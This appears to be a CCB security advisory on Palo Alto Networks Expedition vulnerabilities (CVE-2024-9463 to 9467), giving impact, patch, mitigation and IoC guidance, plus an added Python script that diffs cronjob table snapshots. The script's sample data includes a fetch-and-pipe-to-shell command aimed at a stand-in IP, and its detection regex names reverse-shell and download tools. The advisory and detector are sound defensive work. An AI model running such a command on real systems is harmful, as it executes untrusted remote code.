Reference:
Advisory #2024-239
Version:
1.0
Affected software:
Palo Alto Networks Expedition 1.2.96
Type:
OS command injection, SQL injection, Cleartext storage of sensitive information, Reflected XSS
CVE/CVSS:
CVE-2024-9463 9.9 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N)
CVE-2024-9464 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N)
CVE-2024-9465 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:N/SA:N)
CVE-2024-9466 8.2 (CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N)
CVE-2024-9467 7.0 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N)
https://security.paloaltonetworks.com/PAN-SA-2024-0010
On 09 September 2024, Palo Alto Networks published a security advisory about multiple critical security vulnerabilities in Expedition <1.2.96. Successful exploitation of these vulnerabilities could lead to full access to the entire Expedition filesystem and, by extension, credentials of PAN-OS firewalls. The vulnerabilities severely impact the Confidentiality, Integrity and Availability of these systems. These PAN-OS firewalls are at the border of your organization. They are the first defense for malicious traffic and are a crucial component in the network infrastructure, so it is essential to keep those secure. Palo Alto Networks reported no evidence of active exploitation in the wild at the moment of writing, but firewalls have been a primary target for cybercriminals for a long time.
Update 2024-10-29: A proof of concept (PoC) for CVE-2024-9464, CVE-2024-9465 and CVE-2024-9466 was recently posted on GitHub. While it's still unclear how well it works, it's best to assume these vulnerabilities are now more likely to be targeted.
The vulnerabilities outlined below impact Palo Alto Networks Expedition versions before 1.2.96. These vulnerabilities do not affect other products from Palo Alto Networks, including Cloud NGFW, PAN-OS, Panorama, and Prisma Access. However, it is essential to note that credentials for the PAN-OS firewall may be exposed because of exploiting these vulnerabilities in Expedition.
CVE-2024-9463 is an OS command injection vulnerability with a CVSS of 9.9. CVE-2024-9463 enables a remote, unauthenticated attacker to run arbitrary OS commands after successful exploitation. As a result, there could be a disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
CVE-2024-9464 is an OS command injection vulnerability with a CVSS of 9.3. In contrast to the previous one, a remote attacker needs to be authenticated with low privileges for a successful exploit, but the impact is the same.
CVE-2024-9465 is an SQL injection vulnerability with a CVSS of 9.2. CVE-2024-9465 enables a remote, unauthenticated attacker to access the contents of the Expedition database after successful exploitation. This content includes password hashes, usernames, device configurations, and device API keys.
CVE-2024-9466 is a cleartext storage of sensitive information vulnerability with a CVSS of 8.2. CVE-2024-9466 enables an authenticated attacker to access usernames, passwords and API keys used on the firewall.
CVE-2024-9467 is a reflected XSS vulnerability with a CVSS of 7.0. CVE-2024-9467 enables a remote, unauthenticated attacker to execute malicious JavaScript in the browser of a user who is authenticated to Expedition. If this phishing is successful, the attacker could hijack the user's Expedition session.
Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing. Palo Alto Networks reported this vulnerability is fixed with version Expedition 1.2.96 or later.
Mitigate
For systems where patching cannot be immediately applied, ensure that Expedition is shut down if not in use or that access to Expedition is restricted to authorized users/hosts/networks.
Monitor/Detect
The CCB recommends organizations scale up monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion. In case of an intrusion, you can report an incident via https://ccb.belgium.be/cert/report-incident. While patching appliances or software to the newest version may provide safety from future exploitation, it does not remediate historic compromise. Palo Alto Networks shared a check for indicators of compromise with the following command to be run on the Expedition system (replace root with your username):
mysql -uroot -p -D pandb -e "SELECT * FROM cronjobs;"
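The query above only lists the table; deciding whether its contents are expected is left to the reviewer. The script below is an added example (not CCB or Palo Alto Networks code) that makes that review repeatable: it takes the tab-separated output the mysql client prints for that query, compares it with a snapshot taken when the system was known-good, and reports rows that were added or removed, plus rows matching a small heuristic list of markers that warrant a closer look. The column names, the sample rows and the marker list are constructed for illustration; the script does not depend on the real layout of the cronjobs table, which varies by Expedition version.

```python
"""
Baseline-diff helper for the Expedition `cronjobs` IoC check.

Added example, not code from the CCB advisory or from Palo Alto Networks.
Assumes the output of
    mysql -uroot -p -D pandb -e "SELECT * FROM cronjobs;"
has been captured to a file: the mysql client prints a tab-separated header
row followed by one tab-separated row per record. Column names and sample
rows below are constructed; the real schema is not assumed anywhere.
"""
import re
import sys
from pathlib import Path

# Constructed sample of a captured query result (tab-separated), as a known-good baseline.
SAMPLE_BASELINE = "id\tname\tcommand\n1\tnightly-backup\t/usr/bin/php /home/userSpace/backup.php\n"

# Constructed sample of a later capture with one unexpected entry.
SAMPLE_CURRENT = (
    "id\tname\tcommand\n"
    "1\tnightly-backup\t/usr/bin/php /home/userSpace/backup.php\n"
    "2\tupdate\tcurl -s http://198.51.100.7/x.sh | sh\n"
)

# Heuristic markers that deserve a second look in any scheduled job (constructed list, not
# a Palo Alto Networks indicator set). Extend it from your own environment's norms.
SUSPICIOUS = re.compile(r"(curl|wget|/dev/tcp|base64\s+-d|nc\s|bash\s+-i|\|\s*sh\b|/tmp/)", re.I)


def parse_tsv(text):
    """Parse mysql -e output: first non-empty line is the header, the rest are rows."""
    lines = [line for line in text.splitlines() if line.strip()]
    if not lines:
        return [], []
    header = lines[0].split("\t")
    rows = [tuple(line.split("\t")) for line in lines[1:]]
    return header, rows


def diff_rows(baseline_text, current_text):
    """Return (added, removed): rows present only in the current capture / only in the baseline."""
    _, base = parse_tsv(baseline_text)
    _, cur = parse_tsv(current_text)
    base_set, cur_set = set(base), set(cur)
    return sorted(cur_set - base_set), sorted(base_set - cur_set)


def flag_suspicious(text):
    """Rows in which any field matches a heuristic marker, independent of the baseline."""
    _, rows = parse_tsv(text)
    return [row for row in rows if any(SUSPICIOUS.search(field) for field in row)]


def report(baseline_text, current_text):
    """Combine the baseline diff and the heuristic flags into one result."""
    added, removed = diff_rows(baseline_text, current_text)
    return {"added": added, "removed": removed, "flagged": flag_suspicious(current_text)}


if __name__ == "__main__":
    # Usage: python check_cronjobs.py baseline.tsv current.tsv
    # Without arguments the constructed samples above are used.
    if len(sys.argv) == 3:
        base, cur = Path(sys.argv[1]).read_text(), Path(sys.argv[2]).read_text()
    else:
        base, cur = SAMPLE_BASELINE, SAMPLE_CURRENT
    for key, rows in report(base, cur).items():
        print(f"{key}: {len(rows)}")
        for row in rows:
            print("    " + "\t".join(row))
```

Capture the baseline as soon as the system is patched and reviewed, and rerun the comparison on a schedule; any added row is a change that someone should be able to account for, whether or not it trips a heuristic marker.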